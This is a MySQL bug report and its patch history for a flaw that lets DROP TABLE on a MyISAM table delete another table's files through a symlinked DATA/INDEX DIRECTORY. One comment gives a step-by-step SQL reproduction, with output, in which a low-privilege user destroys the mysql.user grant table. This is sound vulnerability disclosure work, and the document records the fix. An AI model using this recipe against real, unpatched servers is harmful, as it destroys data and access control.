Bug #40980 Drop table can remove another MyISAM table's data and index files
Submitted: 24 Nov 2008 14:40 Modified: 18 Jun 2010 1:21
Reporter: Ingo Strüwing Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server: DDL Severity:S3 (Non-critical)
Version:4.1,5.0,5.1,5.4,6.0 OS:Any (Unix-like systems)
Assigned to: Sergey Vojtovich
Triage: Triaged: D1 (Critical) / R2 (Low) / E2 (Low)

[24 Nov 2008 14:40] Ingo Strüwing
Description:
This was detected during analyze of Bug#39277 (symlink.test fails on Debian), later (Problems with symbolic links), later (Creation of table with data and/or index files in data home directory succeeds).

It was not fixed with the bugfix for that bug. So the drop problem is split out here.

How to repeat:
Please find my comment and test case of 22 Nov 2008 in that bug report.
[24 Nov 2008 14:42] Ingo Strüwing
Copied triage settings from Bug#39277 as this is a split out from there.
[7 Jul 2009 16:07] Ingo Strüwing
The fact that the problem exists since day one doesn't reduce its severity.

The point with the "write access" might be confused. UNIX/Linux is a multi-user system. It has a permission system which can limit what a user can do on the system. It is no big problem to set permissions so that a certain user cannot read nor write datadir. As such he cannot do much harm to the database installation.

But usually every user has read/write access to /tmp. The problem I found thus requires an arbitrary account on the machine (with write access to /tmp, but neither read nor write acces to datadir) and an database account with CREATE and DROP privileges in an arbirtary database (schema).

With this setup the user should not be able to do any harm to databse objects outside of that database (schema). Write access to his home directory and /tmp should not be sufficient to influence the databases from the shell level either.

So what does it mean: "such users can mess-up the server in
any way possible"? What possible attacks can he carry out with his limited permissions?

One thing he can do is this (you may replace MYSQL_TMP_DIR with /tmp or the user's home directory):

#
# Test #2 - Drop mysql.user with CREATE|DROP privileges on another DB.
#
CREATE USER 'mysql_user1';
#
# Create a database for mysql_user1 user's tables.
#
CREATE DATABASE mysql_db1;
#
# Grant mysql_user1 to create and drop tables in mysql_db1.
#
GRANT CREATE, DROP ON mysql_db1.* TO 'mysql_user1';
#
# Show which users we have in the table mysql.user.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Connection con1 - mysql_user1
#
# Make a directory bug39277 somewhere, for example in MYSQL_TMP_DIR.
#
# Create table mysql_db1.user, with its files in bug39277.
#
CREATE TABLE mysql_db1.user (c1 INT) ENGINE=MyISAM
DATA DIRECTORY='MYSQL_TMP_DIR/bug39277'
      INDEX DIRECTORY='MYSQL_TMP_DIR/bug39277';
#
# Remove the table files and the directory bug39277.
#
# Make a symlink from 'mysql' database to MYSQL_TMP_DIR/bug39277.
#
# Drop table mysql_db1.mysql with the files from mysql.user.
DROP TABLE mysql_db1.user;
#
# Connection default - root
#
# Show which users we have in table mysql.user.
# This does work as the table is still open in the table cache.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Close table mysql.user.
#
FLUSH TABLE mysql.user;
#
# Show which users we have in the table mysql.user. Bummer!
#
SELECT User FROM mysql.user;
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Due to missing table files, we cannot drop the user any more.
#
DROP USER 'mysql_user1';
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Cleanup.
#
DROP DATABASE mysql_db1;

IMHO this should not be allowed. DROP should refuse to drop a table if it uses symlinks that resolve into datadir. The attempt should even be reported to the error log.
[14 Jul 2009 13:59] Sergei Golubchik
it's a duplicate of Bug#32167
(and is possible because of a bug in a fix for bug#32167).
[17 Dec 2009 14:21] Tomas Hoger
Was this problem fixed in any version?  This was marked as dupe of bug #32167, but I don't see any comment there indicating related change.  Thanks!
[17 Dec 2009 15:16] Sergei Golubchik
at least it's not fixed in the current 5.1, I've just tested
[22 Mar 2010 11:06] Konstantin Osipov
Server: DDL is Runtime.
[29 Mar 2010 14:52] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104568

3431 Sergey Vojtovich	2010-03-29
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory.
[30 Mar 2010 15:23] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104639

3431 Sergey Vojtovich	2010-03-30
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory. For such tables remove symlink only.
     @ mysql-test/r/symlink.result
        A test case for BUG#40980.
     @ mysql-test/t/symlink.test
        A test case for BUG#40980.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory. For such tables remove symlink only.
[30 Mar 2010 16:28] Ingo Strüwing
Approved. Much better now. Thank you for the test. :-)
[1 Apr 2010 14:49] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/104914

3431 Sergey Vojtovich	2010-04-01
      BUG#40980 - Drop table can remove another MyISAM table's
                  data and index files
      
      It was possible if DATA/INDEX DIRECTORY is pointing to
      symlinked MySQL data home directory.
      
      Do not allow to drop data/index files implicitly symlinked
      to data home directory. For such tables remove symlink only.
     @ mysql-test/r/symlink.result
        A test case for BUG#40980.
     @ mysql-test/t/symlink.test
        A test case for BUG#40980.
     @ storage/myisam/mi_delete_table.c
        Do not allow to drop data/index files implicitly symlinked
        to data home directory. For such tables remove symlink only.
[6 Apr 2010 7:59] Bugs System
Pushed into 5.1.46 (revid:sergey.glukhov@sun.com-20100405111026-7kz1p8qlzglqgfmu) (version source revid:svoj@sun.com-20100401181734-vj1pnmh5129lep5z) (merge vers: 5.1.46) (pib:16)
[15 Apr 2010 16:15] Paul Dubois
Noted in 5.1.46 changelog.

It was possible for DROP TABLE of one MyISAM table to remove the dataand index files of a different MyISAM table.

Setting report to Need Merge pending push into Celosia.
[28 May 2010 5:49] Bugs System
Pushed into mysql-next-mr (revid:alik@sun.com-20100524190136-egaq7e8zgkwb9aqi) (version source revid:alik@sun.com-20100422150750-vp0n37kp9ywq5ghf) (pib:16)
[28 May 2010 6:18] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20100524190941-nuudpx60if25wsvx) (version source revid:alik@sun.com-20100422150658-fkhgnwwkyugtxrmu) (merge vers: 6.0.14-alpha) (pib:16)
[28 May 2010 6:46] Bugs System
Pushed into 5.5.5-m3 (revid:alik@sun.com-20100524185725-c8k5q7v60i5nix3t) (version source revid:alexey.kopytov@sun.com-20100403175504-n95vgc3liknhj3fn) (merge vers: 5.5.4-m3) (pib:16)
[29 May 2010 2:26] Paul Dubois
Noted in 5.5.5, 6.0.14 changelogs.
[17 Jun 2010 11:50] Bugs System
Pushed into 5.1.47-ndb-7.0.16 (revid:martin.skold@mysql.com-20100617114014-bva0dy24yyd67697) (version source revid:vasil.dimov@oracle.com-20100331130613-8ja7n0vh36a80457) (merge vers: 5.1.46) (pib:16)
[17 Jun 2010 12:27] Bugs System
Pushed into 5.1.47-ndb-6.2.19 (revid:martin.skold@mysql.com-20100617115448-idrbic6gbki37h1c) (version source revid:martin.skold@mysql.com-20100609211156-tsac5qhw951miwtt) (merge vers: 5.1.46-ndb-6.2.19) (pib:16)
[17 Jun 2010 13:15] Bugs System
Pushed into 5.1.47-ndb-6.3.35 (revid:martin.skold@mysql.com-20100617114611-61aqbb52j752y116) (version source revid:vasil.dimov@oracle.com-20100331130613-8ja7n0vh36a80457) (merge vers: 5.1.46) (pib:16)